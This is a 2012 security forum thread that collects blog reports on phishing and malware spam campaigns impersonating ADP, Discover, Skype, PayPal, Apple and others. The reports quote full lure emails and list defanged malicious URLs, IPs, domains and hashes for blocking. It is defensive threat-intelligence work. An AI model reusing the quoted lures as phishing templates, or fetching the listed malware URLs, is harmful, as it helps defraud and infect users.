25 Oct 2012 - "This fake ADP spam leads to malware on openpolygons .net:
From: warning @adp .com
Sent: Thu 25/10/2012 16:42
Subject: ADP Instant Message
ADP Pressing Communication
Reference No.: 27711
Respected ADP Client October, 25 2012
Your Transaction Report(s) have been uploaded to the web site:
Click Here to access
Please overview the following information:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This email was sent to existing users in your company that access ADP Netsecure.
As general, thank you for using ADP as your business affiliate!
Ref: 27711
> https://lh3.ggpht.com/-xEHpgbIAYcs/UIlsYnnqtcI/AAAAAAAAAwQ/CoQutqaRwmw/s1600/adp-spam.png
The malicious payload is at [donotclick]openpolygons .net/detects/lorrys_implication.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden) which is an IP address that has been seen before. That IP also hosts the fake AV application win8ss .com and another malware site of legacywins .com...
Plain list for copy-and-pasting:
195.198.124.60
openpolygons .net
win8ss .com
legacywins .com ..."
___
"End of Aug. Statement required" SPAM / kiladopje .ru
- http://blog.dynamoo.com/2012/10/end-of-aug-statement-required-spam.html
25 Oct 2012 - "This spam leads to malware on kiladopje .ru:
From: ZaireLomay @mail .com
Sent: 24 October 2012 20:58
Subject: Re: FW: End of Aug. Statement required
Hi,
as reqeusted I give you inovices issued to you per sept. (Internet Explorer format)
Regards
In this case, there's an attachment called Invoices-23-2012.htm with some obfuscated Javascript to direct visitors to a malware laden page at [donotclick]kiladopje .ru:8080/forum/links/column.php hosted on:
79.98.27.9 (Interneto Vizija, Lithunia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
The following IPs and domains are all related and should be blocked if you can:
68.67.42.41, 72.18.203.140, 79.98.27.9, 84.22.100.108, 85.143.166.170, 132.248.49.112, 190.10.14.196, 202.3.245.13, 203.80.16.81, 209.51.221.247
fidelocastroo .ru
finitolaco .ru
kennedyana .ru
kiladopje .ru
lemonadiom .ru
leprasmotra .ru
ponowseniks .ru
secondhand4u .ru
windowonu .ru ..."
___
Vast email -malware- outbreaks – efaxCorporate and Xerox copiers
- http://blog.commtouch.com/cafe/email-security-news/vast-email-malware-outbreaks-%e2%80%93-efaxcorporate-and-xerox-copiers/
Oct 25, 2012 - "... huge of amounts of email-attached malware distributed – all with an “office” theme. The attacks pushed the amount of email up by several hundred percent and totaled near five billion emails sent worldwide.
> http://blog.commtouch.com/cafe/wp-content/uploads/eFax-malware-levels-24-Oct-2012.jpg
The first part of the day saw emails describing an attachment as being the scan from a Xerox Workcenter... Yesterday’s file was a zipped executable. The second part of the attack moved on to eFaxCorporate, announcing the arrival of a (21 page) fax message. Once again the attachment was an executable file pretending to be a PDF. The file is detected as W32/Trojan2.NTLB... The malware scans the infected system for FTP programs – no doubt looking for FTP credentials that can be stolen to access and compromise Web servers (which can then be used to serve malware links).
> http://blog.commtouch.com/cafe/wp-content/uploads/eFax-message.jpg ..."
:mad:
AplusWebMaster
2012-10-26, 11:20
FYI... multiple entries:
Share of malicious email by country
- http://www.h-online.com/security/news/item/Germany-gets-the-most-malicious-spam-1737717.html?view=zoom;zoom=1
26 Oct 2012
___
Bogus Skype emails lead to malware...
- http://blog.webroot.com/2012/10/26/bogus-skype-password-successfully-changed-notifications-lead-to-malware/
Oct 26, 2012 - "... millions of emails impersonating Skype, in an attempt to trick Skype users that their password has been successfully changed, and that in order to view their call history and change their account settings, they would need to execute the malicious attachment found in the emails...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/skype_email_spam_malware.png
Detection rate for the malicious attachment: MD5: 0e78d3704332c59b619f872fd6d33d25 * ... Trojan-Downloader.Win32.Andromeda.qw. Upon execution, the malware opens a backdoor allowing the cybercriminals behind the campaign complete access to the affected user’s host..."
* https://www.virustotal.com/file/d9e1ea5146c93c69836c0d8d430ab99519032228af9da5c6d0c1d295c3f07a5d/analysis/1350584221/
File name: Skype_Password_inscturtions.pdf.exe
Detection ratio: 32/43
Analysis date: 2012-10-18
___
apl.de.ap SPAM
- http://blog.dynamoo.com/2012/10/apldeap-spam.html
26 Oct 2012 - "I'm not really a fan of the Black Eyed Peas, so I'd never heard of apl.de.ap ( http://en.wikipedia.org/wiki/Apl.de.ap ) until I received this spam. I'm pretty sure that Mr ap isn't sending these out himself, but they're coming from a spammer in the UAE, a place which seems to be the spam capital of the middle east. Although those look like tinyurl links, they're not... they go through a redirector at ykadl .net on 109.236.88.71, the same IP used to send the spam... here's the spam in case you really want to buy tickets from a shady bunch of spammers (NOT)...
From: DNA alex @ ykadl .net
Date: 26 October 2012 04:48
Subject: Black Eyed Peas/ APL DE AP in Dubai
Signed by: ykadl.net
BLACK EYE PEAS founding member APL DE AP heads to Dubai
BLACK EYE PEAS founding member APL DE AP to Dubai for the first time.The internationally famed Black Eyed Peas rapper/DJ, who has won 7 Grammy Awards and sold over 70 million albums, will be the headliner performance at Nasimi Beach on Thursday 1st November.
Like his high school friend Will I Am, APL DE AP also DJ's with international bookings all around the globe including Ibiza, Cannes and London, recently headlining at Belgium's Tomorrowland Festival. The American-Philippines star headlines this event with support from Dion Mavath, local celebrity DJ Marwan Bliss/ 411, Mathew Charles and as well as a performance by Number One selling band Swickasswans.
APL DE AP and the other members of the Black Eyed Peas have been on a hiatus ..."
___
ADP SPAM / steamedboasting .info
- http://blog.dynamoo.com/2012/10/adp-spam-steamedboastinginfo.html
26 Oct 2012 - "This fake ADP spam leads to malware on steamedboasting.info:
From: ClientService @adp .com
Sent: 26 October 2012 12:03
Subject: ADP Instant Notification
ADP Urgent Warning
Reference #: 31344
Dear ADP Client October, 25 2012
Your Transfer Summary(s) have been uploaded to the web site:
https ://www.flexdirect.adp .com/client/login.aspx
Please take a look at the following information:
• Please note that your bank account will be charged within 1 banking day for the amount(s) specified on the Statement(s).
•Please DO NOT reply to this message. automative notification system cannot accept incoming messages. Please Contact your ADP Benefits Specialist.
This note was sent to existing users in your company that approach ADP Netsecure.
As always, thank you for choosing ADP as your business companion!
Ref: 31344
The malicious payload is at [donotclick]steamedboasting .info/detects/burying_releases-degree.php, the initial redirection page has some Cloudflare elements on it which is a bit disturbing. steamedboasting .info is hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden).
This is an alternative variant with the same malicious payload:
Date: Fri, 26 Oct 2012 16:32:10 +0530
From: "noreply @adp .com"
Subject: ADP Prompt Communication
ADP Speedy Notification
Reference #: 27585
Dear ADP Client October, 25 2012
Your Transaction Statement(s) have been put onto the web site:
Web site link
Please see the following notes:
• Please note that your bank account will be charged-off within 1 banking business day for the amount(s) specified on the Protocol(s).
?Please do not reply to this message. automative notification system can't accept incoming mail. Please Contact your ADP Benefits Specialist.
This message was sent to operating users in your company that approach ADP Netsecure.
As always, thank you for choosing ADP as your business partner!
Ref: 27585 [redacted] ..."
___
"Your Photos" SPAM / manekenppa .ru
- http://blog.dynamoo.com/2012/10/your-photos-spam-manekenpparu.html
26 Oct 2012 - "This fake "photos" spam leads to malware on manekenppa .ru:
From: Acacia @redacted .com
Sent: 26 October 2012 10:14
Subject: Your Photos
Hi,
I have attached your photos to the mail (Open with Internet Explorer).
In this case there is an attachment called Image_DIG691233.htm that leads to a malware laden page at [donotclick]manekenppa .ru:8080/forum/links/column.php hosted on some familiar looking IPs:
79.98.27.9 (Interneto Vizija, Lithunia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
We've seen these IPs before and they are well worth blocking."
:mad:
AplusWebMaster
2012-10-28, 20:13
FYI...
Fake BT-Business emails lead to malware ...
- http://blog.webroot.com/2012/10/28/spamvertised-bt-business-direct-order-themed-emails-lead-to-malware/
Oct 28, 2012 - "Over the past 24 hours, cybercriminals have been spamvertising millions of emails targeting customers of BT’s Business Direct in an attempt to trick its users into executing the malicious attachment found in the emails. Upon executing it, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete access to the affected host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/bt_business_direct_spam_email_malware.png
Detection rate for the malicious attachment: MD5: 8d0e220ce56ebd5a03c389bedd116ac5 * ... Trojan-Ransom.Win32.Gimemo.ashm ..."
* https://www.virustotal.com/file/8f429babb19382026798f79b3e7197659639520ffa5199c8bea86c04710f7c48/analysis/
File name: 8D0E220CE56EBD5A03C389BEDD116AC5.fil
Detection ratio: 32/42
Analysis date: 2012-10-25
___
Fake Verizon Wireless emails serve client-side exploits and malware ...
- http://blog.webroot.com/2012/10/27/cybercriminals-impersonate-verizon-wireless-serve-client-side-exploits-and-malware/
Oct 27, 2012 - "... For over a week now, cybercriminals have been persistently spamvertising millions of emails impersonating the company, in an attempt to trick current and prospective customers into clicking on the client-side exploits and malware serving links found in the malicious email. Upon clicking on any of the links, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/verizon_wireless_spam_email_exploits_malware.png
Spamvertised malicious URLs:
hxxp ://coaseguros .com/components/com_ag_google_analytics2/notifiedvzn.html;
hxxp ://clinflows .com/components/com_ag_google_analytics2/vznnotifycheck.html
Client-side exploits serving URL: hxxp ://strangernaturallanguage .net/detects/notification-status_login.php?mzuilm=073707340a&awi=45&dawn=04083703023407370609&iwnjdt=0a000300040002
Sample client-side exploits served: CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: b8d6532dd17c3c6f91de5cc13266f374 * ... Trojan-Spy.Win32.Zbot.fkth
Once executed, the sample phones back to tuningmurcelagoglamour .ru, tuningfordmustangxtremee .ru - 146.185.220.28, AS58014 ..."
* https://www.virustotal.com/file/2d171bb6f2084f123b2e7b5d492e66f5a0df33846b8a5ca9f2cc0232e83561f4/analysis/
File name: b8d6532dd17c3c6f91de5cc13266f374.malware
Detection ratio: 26/44
Analysis date: 2012-10-09 ..."
:mad:
AplusWebMaster
2012-10-29, 13:17
FYI...
Fake British Airways emails serve malware
- http://blog.webroot.com/2012/10/29/cybercriminals-spamvertise-millions-of-british-airways-themed-e-ticket-receipts-serve-malware/
Oct 29, 2012 - "Cybercriminals are currently mass mailing millions of emails in an attempt to trick British Airways customers into executing the malicious attachment found in the spamvertised emails. Upon execution, the malware opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain complete control over the infected host...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/british_airways_spam_email_malware.png
Detection rate for the malicious attachment: MD5: 4a3a345c24fda6987bbe5411269e26b7 * ... Trojan-Downloader.Win32.Andromeda.aey..."
* https://www.virustotal.com/file/39f59152979aeb68c8a5e7e7dbc30ad06fe653a938124e2bd9c462fb7caa5c21/analysis/
File name: BritishAirways-eticket.pdf.exe
Detection ratio: 30/43
Analysis date: 2012-10-23
___
.com malware pretends to be naughty .com website
- http://blog.commtouch.com/cafe/email-security-news/com-malware-pretends-to-be-naughty-com-website/
Oct 28, 2012 - "... The email doesn’t include much text – simply asking that you 'Pay attention at the attach':
Screenshot: http://blog.commtouch.com/cafe/wp-content/uploads/com-trick-blurred.jpg
... As shown in the screenshot it’s www .——-face .com. Those tempted to double-click the “link” in order to visit a porn site would find themselves attacked by malware."
:mad:
AplusWebMaster
2012-10-30, 23:09
FYI...
Bogus Facebook notifications serve malware
- http://blog.webroot.com/2012/10/30/cybercriminals-spamvertise-millions-of-bogus-facebook-notifications-serve-malware/
Oct 30, 2012 - "... cybercriminals spamvertised yet another massive email campaign, impersonating the world’s most popular social network – Facebook. It was similar to a previously profiled spam campaign imitating Facebook. However, in this case the cybercriminals behind it relied on attached malicious archives, compared to including exploits and malware serving links in the email...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/facebook_spam_email_malware.png
Detection rate for the malicious archive: MD5: 0938302fbf8f7db161e46c558660ae0b * ... Trojan.Generic.KDV.753880; Trojan-Ransom.Win32.Gimemo.arsu. Upon execution, the sample opens a backdoor on the infected host, allowing the cybercriminals behind the campaign to gain full access to the affected host..."
* https://www.virustotal.com/file/79f9b49e19495128f3539a2333c669d29f6e52105b7fb47025b9bfe373a7ded6/analysis/1350575670/
File name: FacebookPhoto_album.jpeg.exe
Detection ratio: 34/43
Analysis date: 2012-10-18
___
Blackhat SEO poisoning: Halloween tricks and holiday malware ...
- http://blogs.computerworld.com/cybercrime-and-hacking/21229/blackhat-seo-poisoning-halloween-tricks-and-holiday-malware-interview
Oct 29, 2012 - "... things like blackhat SEO poisoning to successfully infect devices. Blackhat SEO link poisoning, scams, tricks. Although the poisonous pranks and tainted tricks go far beyond Halloween, this seemed a great time to get insight into these trends as well as tips to avoid them. You might know about it, but how about your parents or other people who are not nearly so security-savvy? You might want to warn them that their simple searches could infect their computers... especially if you will be the one called upon to fix them for free ;-) ..."
(More detail at the URL above.)
:mad:
AplusWebMaster
2012-10-31, 19:40
FYI... multiple entries:
Twitter phish is selling drama
- http://www.gfi.com/blog/new-twitter-phish-is-selling-drama/
Oct 30, 2012 - "... new phish in Twitter... you won’t miss it once you visit your direct message (DM) inbox. The message content can be any of the following:
- A horrible rumor is spreading about you
- A nasty rumor is spreading about you
- A terrible rumor is spreading about you
- You see this video of someone taping you? creep
- Hey you hear about the gossip your mentioned in? it started some serious drama, it fired up a lot of people on [URL redacted] sNqp
Whatever the message, it carries a shortened URL that directs the recipient to the domain ivtwtter(dot)com once clicked. Fortunately, the domain is no longer active.
> http://www.gfi.com/blog/wp-content/uploads/2012/10/02-twitter-phish.png
Web browsers have also flagged the URL as a phishing site. If you receive any of these messages (or similar), the best way to handle it is to simply delete it from your DM inbox and warn your followers. In warning them, don’t copy and paste the entire message you received with the live [u]link still in it — as some are prone to do — because this just increases the possibility of the nefarious link getting clicked..."
___
"Your Apple ID has been disabled" phish
- http://blog.dynamoo.com/2012/10/your-apple-id-has-been-disabled-phish.html
31 Oct 2012 - "I've never seen one quite like this before, although it's not the first time I've seen Apple-themed scam emails...
From: Apple no_reply @ macapple .com
Reply-To: no_reply @ macapple .com
Date: 31 October 2012 06:08
Subject: Your Apple ID has been disabled
Apple ID Support
Dear [redacted] ,
This Apple ID has been disabled!
For your protection, your Apple ID ([redacted]) is automatically disabled. We detect unauthorized Login Attempts to your Apple ID from other IP Location. Please verify your identity today or your account will be disabled due to concerns we have for the safety and integrity of the Apple Community.
To verify your Apple ID, we recommend that you go to:
Verify Now >
The phish is hosted at [donotclick]app.apple .com.proiectmaxim .ro/id2/sign_in/login_ID&=/?&=?reactivate=[redacted] and it looks pretty convincing if you haven't spotted the Romanian domain name... It just goes to show that the bad guys will try to phish -anything- these days."
___
HP ScanJet SPAM / donkihotik .ru
- http://blog.dynamoo.com/2012/10/hp-scanjet-spam-donkihotikru.html
31 Oct 2012 - "This fake printer message leads to malware on donkihotik .ru:
Date: Wed, 31 Oct 2012 05:06:42 +0300
From: LinkedIn Connections
Subject: Re: Fwd:Scan from a HP ScanJet #26531
Attachments: HP-Scan-44974.htm
Attached document was scanned and sent
to you using a Hewlett-Packard Officejet PRO.
Sent: by Bria
Image(s) : 6
Attachment: Internet Explorer file [.htm]
Hewlett-Packard Officejet Location: machine location not set
The malicious payload is at [donotclick]donkihotik .ru:8080/forum/links/column.php which is hosted on the same IP addresses as this attack* yesterday."
* http://blog.dynamoo.com/2012/10/craiglist-spam-fionadixru.html
"... some familiar IPs:
68.67.42.41 (Fibrenoire, Canada)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, United States)
Additional name server IPs:
50.22.102.132 (Softlayer, United States)
62.76.186.190 (Clodo-Cloud, Russia)
84.22.100.108 (Cyberbunker, Netherlands)
213.251.171.30 (OVH, France)
Plain list for copy-and-pasting:
50.22.102.132
62.76.186.190
68.67.42.41
84.22.100.108
203.80.16.81
209.51.221.247
213.251.171.30
manekenppa.ru
kiladopje.ru
lemonadiom.ru
finitolaco.ru
fidelocastroo.ru
ponowseniks.ru
dianadrau.ru
windowonu.ru
panalkinew.ru
fionadix.ru ..."
___
Steam phish steals more than credentials
- http://www.gfi.com/blog/new-phish-steals-more-than-steam-credentials/
Oct 31, 2012 - "... targeting players of the popular gaming platform, Steam. More than a year ago, Valve launched Steam Trading. The objective is to “allows you [the Steam account owner] to exchange In-game items and Gifts with everybody in the Steam Community.” It is a good move to get people within their large gaming community to engage with one another and form a bond of camaraderie. Upon its launch, Steam can only cater to a number of gamers. In particular, those who play Team Fortress 2, Portal, Spiral Knights, and other games from Three Rings and SEGA... phishing page that mimics the look and feel of the actual news page announcing the launch. The -bogus- page -baits- unknowing users with one free game this “Steam Happy Day”... at this time of writing Chrome flags the site as a phish... If you play Team Fortress 2, Portal, Spiral Knights plus other SEGA games on Steam and regularly trades items with other players, please avoid and block days(dot)steamgamesgift(dot)yzi(dot)me ... Be wary of free games and offers that would cost you more than you want to bargain for, especially if they’re hosted on dubious sites that use familiar strings in URLs you’d normally see in legitimate sites. To be safe, visit Steam directly* to double-check if they indeed have free offers..."
* http://store.steampowered.com/
:mad:
AplusWebMaster
2012-11-01, 13:09
FYI...
Bogus BofA ‘Online Banking Passcode Reset’ emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/01/bofa-online-banking-passcode-reset-themed-emails-serve-client-side-exploits-and-malware/
Nov 1, 2012 - "Cybercriminals are currently mass mailing millions of emails, in an attempt to trick Bank of America customers into clicking on the exploit and malware-serving link found in the spamvertised email. Relying on bogus “Online Banking Passcode Changed” notifications and professionally looking email templates, the campaign is the latest indication of the systematic rotation of impersonated brands in an attempt to cover as many market segments as possible...
Screenshot of a sample spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/bank_of_america_spam_email_malware_exploits.png
... Client-side exploits serving URL: hxxp ://the-mesgate .net/detects/signOn_go.php – 183.81.133.121, AS38442 ... Also responding to the same IP are the following malicious domains:
stafffire .net – 183.81.133.121, AS38442
hotsecrete .net – Email: counseling1 @ yahoo .com
formexiting .net – suspended domain
navisiteseparation .net – suspended domain ...
Related malicious domains responding the these IPs:
change-hot .net
locksmack .net
Money mule recruitment domains using the same IP as a mailserver:
aurafinancialgroup .com
epscareers .com
As you can see, this campaign is great example of the very existence of the cybercrime ecosystem. Not only are they spamvertising millions of exploits and malware serving emails, they’re also multitasking on multiple fronts, as these two domains are recruiting money mules to process fraudulently obtained assets from the affected victims..."
___
Discover card SPAM / netgear-india.net
- http://blog.dynamoo.com/2012/11/discover-card-spam-netgear-indianet.html
1 Nov 2012 - "This fake Discover Card spam leads to malware on netgear-india .net:
From: Discover Account Notes [mailto:no-reply @ notify .discover .com]
Sent: Thu 01/11/2012 15:32
Subject: Great Details Changes in your Discover card Account Terms
Account Services | Customer Care Services
Account ending in XXX1
An substantial communication regarding latest Declined Transfers is waiting for you.
Log In to Read Information
Honored Discover Client,
There is an serious message waiting for you from Discover® card. Please read the message mindfully and keep it with your file.
To ensure optimal privacy, please log in to view your message at Discover.com.
Please click on this link if you have forgotten your UserID or Password.
Add information @ service .discover .com to your address book to ensure delivery of these notifications.
VITAL NOTE
This message was delivered to [redacted] for Discover debit card account number ending with XXX1.
You are receiving this e-mail because you have account at Discover.com.
Log in to change your e-mail address or overview your account e-mail options.
If you have any questions about your account, please Login to leave us a message securely and we would be glad to support you.
Please DO NOT reply to this message. auto informer system cannot accept incoming email.
DISCOVER and other trademarks, logos and service marks used in this e-mail are the trademarks of Discover Financial Services or their respective third-party owners.
Discover Banking Ltd.
P.O. Box 84265
Salt Lake City, SC 76433
2012 Discover Bank, Member FDIC
[redacted]
========
From: Discover Account Notes [mailto:donotreply @service .discover .com]
Sent: Thu 01/11/2012 16:36
Subject: Substantial Information about your Discover Account
Account Center | Customer Center
Account ending in XXX9
An significant message regarding latest Approved Activity is waiting for you.
Log In to Overview Details
Respective Cardholder,
There is an important message waiting for you from Discover® card. Please read the message carefully and keep it with your archive.
To ensure optimal privacy, please sign in to read your data at Discover.com.
Please visit discover .com if you have forgotten your Login ID or Password.
Add discover @ information .discover .com to your trusted emails to ensure delivery of these messages.
VITAL NOTIFICATION
This e-mail was sent to [redacted] for Discover card account No. ending with XXX9.
You are receiving this e-mail because you member of Discover.com.
Log in to change your e-mail address or view your account e-mail settings.
If you have any questions about your account, please Enter your account to leave us a message securely and we would be blissful to help you.
Please don't reply to this message. auto-notification system cannot accept incoming mail.
DISCOVER and other trademarks, logos and service marks used in this e-mail are the trademarks of Discover Financial Services or their respective third-party owners.
Discover Banking Llc.
P.O. Box 85486
Seashore City, NV 91138
2012 Discover Bank, Member FDIC
[redacted]
The malicious payload is at [donotclick]netgear-india .net/detects/discover-important_message.php hosted on 183.180.134.217 (RAT CO, Japan). The following domains are on that same IP, and judging by the registration details they should also be considered as malicious:
itracrions .pl
radiovaweonearch .com
steamedboasting .info
solla .at
netgear-india .net
puzzledbased .net
stempare .net
questionscharges .net
bootingbluray .net ..."
___
Hurricane Sandy SPAMs lead to survey scams
- http://nakedsecurity.sophos.com/2012/11/01/hurricane-sandy-spams-lead-to-survey-scams/
Nov 1, 2012 - "... we began to see the first online criminals trying to cash in on the interest in Hurricane Sandy. The good news is they are not trying to spread malware (yet), but the bad news is they are trying to take advantage of a natural disaster affecting millions. The subject lines of the scam messages -- "Sandy Got you down? We've got you covered!", "Don't let the storm ruin your diner plans" and "Avoid the Storm, Eat at chilis!" -- appear to be targeting people who may need to file insurance claims related to damages from the "super storm" and other people who are simply hungry. The bodies of the emails aren't terribly interesting, but every place in the message is a link to a site called "remain watery." The domain was registered on October 15th, clearly in anticipation of creating more victims from this crisis... For those who are affected by the hurricane, stay safe, stay secure, and don't fall for it. The last thing you need right now is another thing to worry about cleaning up after."
___
Hurricane Sandy pump and dump SPAM
- http://blog.commtouch.com/cafe/anti-scam/pump-and-dump-spam-waits-for-hurricane-sandy/
Oct 31, 2012 - "... recipients are encouraged to buy into low-priced shares now that Hurricane Sandy has passed and trading has resumed.
> http://blog.commtouch.com/cafe/wp-content/uploads/Hurricane-Sandy-stock-spam.jpg
... we see less topical spam than we used to. In the past spammers would use current events in subjects and in the text of emails to create interest and generate visits to pharmacy and replica websites..."
:mad:
AplusWebMaster
2012-11-02, 14:40
FYI...
Fake ADP SPAM emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/02/adp-immediate-notification-themed-emails-lead-to-black-hole-exploit-kit/
Nov 2, 2012 - "... cybercriminals behind the recently profiled malicious campaign impersonating Bank of America, launched yet another massive spam campaign, this time targeting ADP customers. Upon clicking on the link found in the malicious email, users are exposed to the client-side exploits served by the latest version of the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/adp_email_spam_exploits_malware.png
... Client-side exploits serving URL: hxxp ://reasonedblitzing .net/detects/lorrys_implication.php – 195.198.124.60, AS3301 – Email: monteene_forbrich8029 @ mauritius.com; hxxp ://nfcmpaa .info/detects/burying_releases-degree.php – 195.198.124.60, AS3301 – Email: nevein_standrin35 @ kube93mail .com...
Responding to the same IP are also the following malicious domains:
win8ss .com – Email: fermetnolega @ hotmail .com
legacywins .com – Email: fermetnolega @hotmail .com
openpolygons .net – Email: cordey_yabe139 @ flashmail .net
steamedboasting .info – Email: mauro_borozny655 @ medical .net.au
Name servers part of the campaign’s infrastructure:
Name Server: NS1.TOPPAUDIO .COM
Name Server: NS2.TOPPAUDIO .COM
We’ve already seen the same name servers used in the recently profiled “BofA ‘Online Banking Passcode Reset’ themed emails serve client-side exploits and malware” malicious campaign. Clearly, the cybercriminal or gang of cybercriminals behind the campaign continue rotating the impersonated brands, next to using the same malicious infrastructure to achieve their objectives..."
___
Fake "Payroll Account Cancelled by Intuit" email
- http://security.intuit.com/alert.php?a=67
11/2/2012 - "People are receiving emails with the title "Notification Only: Payroll Account Cancelled by Intuit." Below is a copy of the email people are receiving.
Direct Deposit Service Informer
Informational Only
We processed your payroll on November 1, 2012 at 365 PM Pacific Time.
Money would be revoked from the Checking account number ending in: XXX3 on November 2, 2012.
total to be left: $2 465.98
Paychecks would be deferred to your workforce' accounts on: November, 2, 2012
Sign In to Overview Details
Funds are typically departed before business banking hours so please be sure you have enough Cash on the account by 12 a.m. on the date Funds are to be withdrawn.
Intuit must process your payroll by 4 p.m. Eastern time, two banking days before your paycheck date or your personnel will not be paid on time. QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
This is the end of the fake email..."
- http://blog.dynamoo.com/2012/11/intuit-spam-savedordercommunicatesinfo.html
2 Nov 2012 - "... fake Intuit spam leads to malware on savedordercommunicates .info:
... Subject: Notification Only: Transaction Received by Intuit"...
The malicious payload is at [donotclick]savedordercommunicates .info/detects/bank_thinking.php hosted on 75.127.15.39 (New Wave NetConnect, US) along with another malicious domain of teamscapabilitieswhich .org. Blocking this IP would be wise."
___
Wire Transfer SPAM / webmoniacs .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-spam-webmoniacsru.html
2 Nov 2012 - "This fake wire transfer spam leads to malware on webmoniacs .ru:
Date: Fri, 2 Nov 2012 06:23:10 +0700
From: service @ paypal .com
Subject: RE: Wire Transfer cancelled
Dear Sirs,
The Wire transfer was canceled by the other bank.
Canceled transaction:
FED REFERENCE NUMBER: 628591160ACH34584
Transaction Report: View
The Federal Reserve Wire Network
The malicious payload is at [donotclick]webmoniacs .ru:8080/forum/links/column.php hosted on:
65.99.223.24 (RimuHosting, US)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
The following IPs and domain are all connected and should be blocked:
50.22.102.132
62.76.186.190
65.99.223.24
68.67.42.41
79.98.27.9
84.22.100.108
85.143.166.170
132.248.49.112
203.80.16.81
209.51.221.247
213.251.171.30
denegnashete .ru
dianadrau .ru
donkihotik .ru
fidelocastroo .ru
finitolaco .ru
fionadix .ru
forumibiza .ru
kiladopje .ru
lemonadiom .ru
manekenppa .ru
panacealeon .ru
panalkinew .ru
pionierspokemon .ru
ponowseniks .ru
rumyniaonline .ru
webmoniacs .ru
windowonu .ru ..."
- https://www.ic3.gov/media/2012/121101.aspx
Nov 1, 2012
:mad:
AplusWebMaster
2012-11-05, 14:11
FYI...
Malware... as a Vodafone MMS message
- http://h-online.com/-1743608
5 Nov 2012 - "The phone number from which the message was supposedly sent varies... Cyber criminals are currently spreading malware by sending a large number of email messages purporting to be from Vodafone's MMS gateway. These emails have the subject "You have received a new message" and claim that the recipient has been sent a picture message over MMS from a Vodafone customer. The Vodafone email address used and the supposed telephone number sending the messages varies*; even the country code is changed based on the location being targeted...
* http://www.h-online.com/security/news/item/Malware-discussed-as-an-MMS-message-1743608.html?view=zoom;zoom=1
The messages say that a picture message is in the attached "Vodafone_MMS.zip" file. However, once unzipped, it only contains an executable named "Vodafone_MMS.jpg.exe" that will install malware onto a victim's system when launched... VirusTotal*... To avoid accidentally opening such files and becoming infected with malware, Windows users should also make sure that file name extensions are always shown**..."
* https://www.virustotal.com/file/bb2fadd8e156cf40753cabb38db5a0d88c1d5cd90418a9a26e60e9248a65f9a7/analysis/
File name: Vodafone_MMS.zip
Detection ratio: 11/43
Analysis date: 2012-11-05
** https://en.wikipedia.org/wiki/Filename_extension#Security_issues
"... default behavior of Windows Explorer... is for filename extensions -not- to be shown... without alerting the user to the fact that (it may be) a harmful computer program..."
___
Wire Transfer & PayPal SPAM / forumibiza .ru
- http://blog.dynamoo.com/2012/11/wire-transfer-paypal-spam-forumibizaru.html
5 Nov 2012 - "These two spam campaigns lead to malware on forumibiza .ru:
Date: Mon, 5 Nov 2012 12:54:44 +0530
From: Declan Benjamin via LinkedIn ...
Subject: Wire Transfer Confirmation (FED 27845UL095)
Good afternoon,
Your Wire Transfer Amount: USD 85,714.01
Wire Transfer Report: View
ELOISA STRICKLAND,
The Federal Reserve Wire Network
==============
From: JoyceMillwee @ mail .com
Sent: 05 November 2012 01:48
Subject: Welcome to PayPal - Choose your way to pay
Welcome
Hello [redacted],
Thanks for paying with PayPal.
We congratulate you with your first Paypal money transfer. But we have hold it for the moment because the amount is over the security borders of our rules.
Here is what we have on file for you. Take a second to confirm we have your correct information.
Email
[redacted]
Confirmation Code
5693-0930-8767-9350-6794
Transfer Information
Amount: 27380.54 $
Reciever: Gracia Cooley
E-mail: Gage97742 @[redacted] .com
Accept Decline
Help Center | Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright 2012 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
PayPal Email ID PP6118
The malicious payload in both cases is [donotclick]forumibiza .ru:8080/forum/links/column.php hosted on the following IPs:
65.99.223.24 (RimuHosting, US)
103.6.238.9 (Universiti Putra, Malaysia)
203.80.16.81 (MYREN, Malaysia) ..."
___
Something evil on 31.193.12.3
- http://blog.dynamoo.com/2012/11/something-evil-on-31193123.html
4 Nov 2012 - "These are fake AVs and drive-by downloads mostly, some seem to promoted through low-grade banner ads, all hosted on 31.193.12.3 (Burstnet, UK**) and suballocated to:
person: Olexii Kovalenko
address: Pavlova, 15, Zaporozhye, Zaporozhye, 69000, Ua
phone: +1 570 343 2200
fax-no: +1 570 343 9533
nic-hdl: OK2455-RIPE
source: RIPE # Filtered
mnt-by: mnt-burst-au
mnt-by: mnt-burst-mu
The registration for the .asia and .eu domains is consistent in the ones I have checked:
Registrant ID:DI_23063626
Registrant Name: Javier
Registrant Organization: n/a
Registrant Address: Nevskaya street 41
Registrant Address2:
Registrant Address3:
Registrant City: Belgorad
Registrant State/Province: Belgorodskaya oblast
Registrant Country/Economy: RU
Registrant Postal Code:494980
Registrant Phone:+007.9487728744
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant E-mail:007uyfo007 @mail .ru
